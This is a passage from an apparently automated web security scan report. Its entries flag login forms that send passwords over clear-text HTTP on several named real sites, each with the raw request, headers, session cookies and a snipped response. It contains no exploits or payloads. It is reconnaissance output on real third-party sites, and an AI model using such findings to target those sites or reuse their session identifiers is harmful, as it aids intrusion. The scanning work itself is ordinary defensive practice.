User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 04:39:52 GMT
Server: Apache/2.0.54 (Debian GNU/Linux) PHP/4.3.10-22 mod_ssl/2.0.54 OpenSSL/0.9.7e
X-Powered-By: PHP/4.3.10-22
P3P: policyref="http://www.w-w-i.com/w3c/p3p.xml",
Set-Cookie: THESESSION=7b2679674344bff40c7a2cdf1e0ad477; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 27127

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>World Wide Images :: Velux 5 Oceans 2010 Race :: Online Press Office</title>
<meta name=
...[SNIP]...
<div id="search3" class="search"><form method="post" enctype="multipart/form-data" action="/velux_5_oceans_2010_race/logoffon.php"><div>
...[SNIP]...
<br><input type="password" name="pword" id="pword"><br>
...[SNIP]...

6.130. http://www.woothemes.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.woothemes.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.woothemes.com/wp-login.php
The form contains the following password field:
  • pwd

Request

GET / HTTP/1.1
Host: www.woothemes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 00:11:04 GMT
Server: LiteSpeed
Connection: close
X-Powered-By: PHP/5.3.2
Last-Modified: Tue, 25 Jan 2011 00:10:45 GMT
Vary: Cookie
X-Pingback: http://www.woothemes.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Content-Length: 25957

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head profile="http://gmpg.org/xfn/1
...[SNIP]...
</div><form name="loginform" action="http://www.woothemes.com/wp-login.php" method="post"> <label for="userid" class="fl">
...[SNIP]...
</label> <input class="password fr" type="password" name="pwd" value="" id="password" size="10"/><div class="fix">
...[SNIP]...

6.131. http://www.x64bitdownload.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET / HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:20:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:30:39 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 64487

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.132. http://www.x64bitdownload.com/64-bit-archive-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-archive-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-archive-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:54 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22archive%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22archive%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 93426


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.133. http://www.x64bitdownload.com/64-bit-assembling-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-assembling-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-assembling-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:48:47 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22assembling%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 72783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.134. http://www.x64bitdownload.com/64-bit-atom-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-atom-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-atom-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:50:19 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:00:20 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A4%3A%22atom%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89319


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.135. http://www.x64bitdownload.com/64-bit-audio-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-audio-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-audio-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:39:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22audio%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 96673


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.136. http://www.x64bitdownload.com/64-bit-automatic-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-automatic-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-automatic-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:40:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:50:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22automatic%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90216


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.137. http://www.x64bitdownload.com/64-bit-autoposter-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-autoposter-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-autoposter-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:47:05 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A10%3A%22autoposter%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 36293


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.138. http://www.x64bitdownload.com/64-bit-binaries-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-binaries-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-binaries-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:17 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A8%3A%22binaries%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88854


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.139. http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-binary-downloader-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-binary-downloader-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:52:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:02:42 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A17%3A%22binary-downloader%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A17%3A%22binary+downloader%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 35748


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.140. http://www.x64bitdownload.com/64-bit-binary-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-binary-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-binary-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:36:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:46:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22binary%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91309


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.141. http://www.x64bitdownload.com/64-bit-board-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-board-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-board-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:03 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A5%3A%22board%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 88225


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.142. http://www.x64bitdownload.com/64-bit-boards-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-boards-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-boards-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:05:00 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22boards%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 86911


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.143. http://www.x64bitdownload.com/64-bit-client-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-client-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-client-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:38:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:49:29 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A6%3A%22client%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 91161


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.144. http://www.x64bitdownload.com/64-bit-commander-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-commander-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-commander-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:48 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:59 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22commander%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22commander%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 89024


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.145. http://www.x64bitdownload.com/64-bit-community-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-community-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-community-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:50 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:10:27 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A9%3A%22community%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A9%3A%22community%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 90778


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.146. http://www.x64bitdownload.com/64-bit-complex-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-complex-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-complex-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:59:13 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:09:34 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A5%3A%7Bs%3A16%3A%22keywords_encoded%22%3Bs%3A7%3A%22complex%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22s%22%3Bs%3A8%3A%22keywords%22%3Bs%3A7%3A%22complex%22%3Bs%3A1%3A%22p%22%3Bi%3A25%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85797


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

6.147. http://www.x64bitdownload.com/64-bit-conference-downloads.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /64-bit-conference-downloads.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field:
  • password

Request

GET /64-bit-conference-downloads.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:54:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 16:04:59 GMT
Cache-Control: max-age=600
Pragma: cache
